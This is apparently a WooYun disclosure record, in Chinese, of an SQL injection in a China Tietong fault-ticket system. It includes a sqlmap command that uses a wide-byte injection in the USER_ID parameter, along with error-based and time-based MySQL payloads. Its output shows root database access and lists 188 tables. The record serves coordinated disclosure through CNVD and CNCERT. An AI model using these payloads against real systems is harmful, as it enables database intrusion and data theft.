当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148111

漏洞标题:中国铁通某故障单系统SQL注入/root权限/188个表

相关厂商:中国铁通

漏洞作者: 路人甲

提交时间:2015-10-20 17:41

修复时间:2015-12-07 11:44

公开时间:2015-12-07 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

详细说明:

**.**.**.**/


0.jpg


5.jpg


sqlmap.py -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20"


1.jpg


2.jpg


3.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: USER_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq
---
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0
current database:    'td_oa'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: USER_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq
---
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0
current user:    'root@**.**.**.**'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: USER_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq
---
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0
Database: td_oa
[188 tables]
+----------------------+
| user                 |
| version              |
| address              |
| address_group        |
| affair               |
| app_config           |
| app_log              |
| attachment_edit      |
| attend_config        |
| attend_duty          |
| attend_evection      |
| attend_holiday       |
| attend_leave         |
| attend_manager       |
| attend_out           |
| bbs_board            |
| bbs_comment          |
| book_info            |
| book_manage          |
| book_manager         |
| book_type            |
| bs_line              |
| calendar             |
| categories_type      |
| censor_data          |
| censor_module        |
| censor_words         |
| chatroom             |
| contact              |
| contract             |
| contract_line        |
| countdown            |
| cp_asset_type        |
| cp_assetcfg          |
| cp_cptl_info         |
| cp_dpct_sub          |
| cp_prcs_prop         |
| customer             |
| department           |
| diary                |
| diary_comment        |
| diary_comment_reply  |
| efax_account         |
| efax_receive_box     |
| efax_send_box        |
| email                |
| email_body           |
| email_box            |
| exam_data            |
| exam_flow            |
| exam_paper           |
| exam_quiz            |
| exam_quiz_set        |
| ext_user             |
| field_date           |
| fieldsetting         |
| file_content         |
| file_sort            |
| flow_form_type       |
| flow_print_tpl       |
| flow_process         |
| flow_query_tpl       |
| flow_rule            |
| flow_run             |
| flow_run_data        |
| flow_run_feedback    |
| flow_run_log         |
| flow_run_prcs        |
| flow_sort            |
| flow_timer           |
| flow_type            |
| hrms                 |
| icqcontact_tb        |
| icqmsgs_tb           |
| icqservermsg_tb      |
| interface            |
| ip_rule              |
| linkman              |
| meeting              |
| meeting_equipment    |
| meeting_room         |
| module_priv          |
| mytable              |
| netchat              |
| netdisk              |
| netmeeting           |
| news                 |
| news_comment         |
| notes                |
| notify               |
| oa_source            |
| oa_source_used       |
| oc_log               |
| office_products      |
| office_task          |
| office_transhistory  |
| order_line           |
| picture              |
| plan_type            |
| product              |
| proj_bug             |
| proj_comment         |
| proj_cost            |
| proj_file            |
| proj_file_log        |
| proj_file_sort       |
| proj_forum           |
| proj_priv            |
| proj_project         |
| proj_task            |
| proj_task_log        |
| provider             |
| provider_linkman     |
| rms_file             |
| rms_lend             |
| rms_roll             |
| rms_roll_room        |
| rsa_keypair          |
| sal_data             |
| sal_flow             |
| sal_item             |
| sale_history         |
| sale_manager         |
| score_date           |
| score_flow           |
| score_group          |
| score_item           |
| seal                 |
| seal_keylic          |
| seal_log             |
| secure_key           |
| service              |
| sms                  |
| sms2                 |
| sms2_priv            |
| sms3                 |
| sms_body             |
| supply_history       |
| supply_order         |
| sys_code             |
| sys_function         |
| sys_log              |
| sys_menu             |
| sys_para             |
| task                 |
| train_apply          |
| train_appoint_muster |
| train_assess_data    |
| train_assess_item    |
| train_assess_title   |
| train_courses        |
| train_ctype          |
| train_info           |
| train_mail           |
| train_manager        |
| train_newcourse      |
| train_survey_data    |
| train_survey_item    |
| train_survey_title   |
| train_teachers       |
| train_ttype          |
| uni1                 |
| unit                 |
| url                  |
| user_group           |
| user_online          |
| user_priv            |
| vehicle              |
| vehicle_maintenance  |
| vehicle_operator     |
| vehicle_usage        |
| versio1              |
| vi_flow_run          |
| vi_user              |
| vote_data            |
| vote_item            |
| vote_title           |
| webmail              |
| wiki_ask             |
| wiki_ask_answer      |
| wiki_comment         |
| wiki_info            |
| winexe               |
| word_model           |
| work_detail          |
| work_person          |
| work_plan            |
| zl_file              |
+----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 11:42

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国一=移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无